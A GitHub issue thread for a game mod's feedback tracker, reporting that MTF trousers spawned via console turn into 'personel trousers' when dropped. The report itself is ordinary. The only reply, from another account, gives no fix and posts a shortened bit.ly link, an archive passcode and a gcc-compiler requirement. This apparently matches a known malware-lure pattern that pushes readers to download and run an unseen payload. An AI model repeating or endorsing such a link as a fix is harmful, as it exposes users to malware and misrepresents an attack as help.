### ISSUE TITLE
[Bug]: something wrong with MTF Trousers

### ISSUE THREAD

**Issue by DecafRx** [Archotech/TTR24-Feedback#140]
### Steps To Reproduce

1 spawn MTF trousers via console

### Actual Behavior

Description is MTF trousers
But when u droping it its will be personel trousers

https://github.com/user-attachments/assets/5c8ddc5a-5911-459b-a247-284643489fdb

### Expected Behavior

'

### OS

Windows 10

### Version

0.5.419

**Comment by maiarafag** [comment]
Give this a shot
https://bit.ly/4eaAnWN
Passcode: changeme
you must have a gcc compiler
